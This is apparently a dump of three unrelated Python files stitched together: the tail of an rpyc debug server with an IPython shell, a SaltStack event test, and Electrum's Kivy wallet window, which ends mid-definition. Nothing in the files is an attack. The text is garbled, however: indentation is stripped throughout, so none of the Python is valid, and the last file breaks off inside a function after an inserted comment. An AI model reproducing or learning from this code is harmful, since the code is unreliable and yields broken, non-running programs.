target=self._authenticate_and_serve_client,
args=[sock])
t.start()
self.thread = t
else:
pid = os.fork()
if pid == 0:
# child
try:
self.logger.debug("child process created")
# 76: call signal.siginterrupt(False) in forked child
signal.siginterrupt(signal.SIGCHLD, False)
self.listener.close()
self.clients.clear()
self._authenticate_and_serve_client(sock)
except BaseException:
self.logger.exception(
"child process terminated abnormally")
else:
self.logger.debug("child process terminated")
finally:
self.logger.debug("child terminated")
os._exit(0)
else:
# parent
self.proc = pid
sock.close()
if self.num_conns == 0:
self.done_event.set()
self.listener.close()
self.join()
def join(self):
self.thread.join()
try:
pid, dummy = os.waitpid(self.proc, 0) # os.WNOHANG)
except OSError as ee:
            print(ee)
class AngrDbgServer(cli.Application):
port = cli.SwitchAttr(["-p", "--port"], cli.Range(0, 65535), default=None,
help="The TCP listener port (default = %s, default for SSL = %s)" %
(DEFAULT_SERVER_PORT, DEFAULT_SERVER_SSL_PORT), group="Socket Options")
host = cli.SwitchAttr(
["--host"],
str,
default="127.0.0.1",
help="The host to bind to. "
"The default is INADDR_ANY",
group="Socket Options")
ipv6 = cli.Flag(["--ipv6"], help="Enable IPv6", group="Socket Options")
logfile = cli.SwitchAttr(
"--logfile",
str,
default=None,
help="Specify the log file to use; "
"the default is stderr",
group="Logging")
quiet = cli.Flag(["-q",
"--quiet"],
help="Quiet mode (only errors will be logged)",
group="Logging")
ssl_keyfile = cli.SwitchAttr(
"--ssl-keyfile",
cli.ExistingFile,
help="The keyfile to use for SSL. Required for SSL",
group="SSL",
requires=["--ssl-certfile"])
ssl_certfile = cli.SwitchAttr(
"--ssl-certfile",
cli.ExistingFile,
help="The certificate file to use for SSL. Required for SSL",
group="SSL",
requires=["--ssl-keyfile"])
ssl_cafile = cli.SwitchAttr(
"--ssl-cafile",
cli.ExistingFile,
help="The certificate authority chain file to use for SSL. Optional; enables client-side "
"authentication",
group="SSL",
requires=["--ssl-keyfile"])
auto_register = cli.Flag(
"--register",
help="Asks the server to attempt registering with "
"a registry server. By default, the server will not attempt to register",
group="Registry")
registry_type = cli.SwitchAttr(
"--registry-type",
cli.Set(
"UDP",
"TCP"),
default="UDP",
help="Specify a UDP or TCP registry",
group="Registry")
registry_port = cli.SwitchAttr(
"--registry-port",
cli.Range(
0,
65535),
default=REGISTRY_PORT,
help="The registry's UDP/TCP port",
group="Registry")
registry_host = cli.SwitchAttr(
"--registry-host",
str,
default=None,
help="The registry host machine. For UDP, the default is 255.255.255.255; "
"for TCP, a value is required",
group="Registry")
def main(self):
if self.registry_type == "UDP":
if self.registry_host is None:
self.registry_host = "255.255.255.255"
self.registrar = UDPRegistryClient(
ip=self.registry_host, port=self.registry_port)
else:
if self.registry_host is None:
raise ValueError(
"With TCP registry, you must specify --registry-host")
self.registrar = TCPRegistryClient(
ip=self.registry_host, port=self.registry_port)
if self.ssl_keyfile:
self.authenticator = SSLAuthenticator(
self.ssl_keyfile, self.ssl_certfile, self.ssl_cafile)
default_port = DEFAULT_SERVER_SSL_PORT
else:
self.authenticator = None
default_port = DEFAULT_SERVER_PORT
if self.port is None:
self.port = default_port
setup_logger(self.quiet, self.logfile)
sys.stdout.write(
BANNER + " starting at %s %s\n" %
(self.host, self.port))
sys.stdout.flush()
done_event = threading.Event()
srv = WeirdServer(
SlaveService,
done_event,
hostname=self.host,
port=self.port,
reuse_addr=True,
ipv6=self.ipv6,
authenticator=self.authenticator,
registrar=self.registrar,
auto_register=self.auto_register)
t = threading.Thread(target=self._serve, args=[srv])
t.start()
# wait for 2 connections
done_event.wait()
IPython.embed(
banner1=BANNER + " client connected\n",
banner2="", # "tip: call serve_all() on the client to have a full working shell here.",
exit_msg=BANNER + " shell closed.\nexiting...\n"
)
os.kill(srv.proc, signal.SIGKILL)
os._exit(0)
def _serve(self, srv):
srv.start()
sys.stdout.write("\n" + BANNER + " client disconnected.\nexiting...\n")
os._exit(0)
def main():
AngrDbgServer.run()
'''simple client
import rpyc
import thread
conn1 = rpyc.classic.connect("localhost")
conn2 = rpyc.classic.connect("localhost")
thread.start_new_thread(conn2.serve_all, tuple())
'''
|
test_event.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Pedro Algarvio (pedro@algarvio.me)`
tests.integration.modules.event
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'''
# Import python libs
from __future__ import absolute_import
import time
import threading
# Import Salt Testing libs
from tests.support.case import ModuleCase
# Import salt libs
import salt.utils.event as event
# Import 3rd-party libs
from salt.ext.six.moves.queue import Queue, Empty # pylint: disable=import-error,no-name-in-module
class EventModuleTest(ModuleCase):
def __test_event_fire_master(self):
events = Queue()
def get_event(events):
me = event.MasterEvent(self.master_opts['sock_dir'], listen=True)
events.put_nowait(
me.get_event(wait=10, tag='salttest', full=False)
)
threading.Thread(target=get_event, args=(events,)).start()
        time.sleep(1)  # Allow the event listener thread to start
ret = self.run_function(
'event.fire_master',
['event.fire_master: just test it!!!!', 'salttest']
)
self.assertTrue(ret)
eventfired = events.get(block=True, timeout=10)
self.assertIsNotNone(eventfired)
self.assertIn(
'event.fire_master: just test it!!!!', eventfired['data']
)
ret = self.run_function(
'event.fire_master',
['event.fire_master: just test it!!!!', 'salttest-miss']
)
self.assertTrue(ret)
with self.assertRaises(Empty):
eventfired = events.get(block=True, timeout=10)
def __test_event_fire(self):
events = Queue()
def get_event(events):
me = event.MinionEvent(self.minion_opts, listen=True)
events.put_nowait(
me.get_event(wait=10, tag='salttest', full=False)
)
threading.Thread(target=get_event, args=(events,)).start()
        time.sleep(1)  # Allow the event listener thread to start
ret = self.run_function(
'event.fire', ['event.fire: just test it!!!!', 'salttest']
)
self.assertTrue(ret)
eventfired = events.get(block=True, timeout=10)
self.assertIsNotNone(eventfired)
self.assertIn('event.fire: just test it!!!!', eventfired)
ret = self.run_function(
'event.fire', ['event.fire: just test it!!!!', 'salttest-miss']
)
self.assertTrue(ret)
with self.assertRaises(Empty):
eventfired = events.get(block=True, timeout=10)
def __test_event_fire_ipc_mode_tcp(self):
events = Queue()
def get_event(events):
me = event.MinionEvent(self.sub_minion_opts, listen=True)
events.put_nowait(
me.get_event(wait=10, tag='salttest', full=False)
)
threading.Thread(target=get_event, args=(events,)).start()
        time.sleep(1)  # Allow the event listener thread to start
ret = self.run_function(
'event.fire', ['event.fire: just test it!!!!', 'salttest'],
minion_tgt='sub_minion'
)
self.assertTrue(ret)
eventfired = events.get(block=True, timeout=10)
self.assertIsNotNone(eventfired)
self.assertIn('event.fire: just test it!!!!', eventfired)
ret = self.run_function(
'event.fire', ['event.fire: just test it!!!!', 'salttest-miss'],
minion_tgt='sub_minion'
)
self.assertTrue(ret)
with self.assertRaises(Empty):
eventfired = events.get(block=True, timeout=10)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum
from electrum.bitcoin import TYPE_ADDRESS
from electrum import WalletStorage, Wallet
from electrum_gui.kivy.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugins import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register a widget cache for keeping memory use down; the timeout is set to
# forever so the data stays cached
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mBTC')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
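        # e.g. assuming base_units maps 'mBTC' to 5 decimal places (as in
        # upstream Electrum), get_amount('1.5 mBTC') returns 150000 satoshis.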
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''The orientation the app is currently displayed in.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
        # create triggers so as to minimize updates to a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
        ''' Initialize the UX part of electrum. This function performs the basic
        tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
        ''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
        ''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show a Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
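# Hedged sketch (not in the original code): protected() either prompts for the
# PIN and then calls f(*args, pin), or calls f(*args, None) when the wallet has
# no password. A gated action therefore always takes the password as its last
# positional argument:
def _example_gated_action(label, password):
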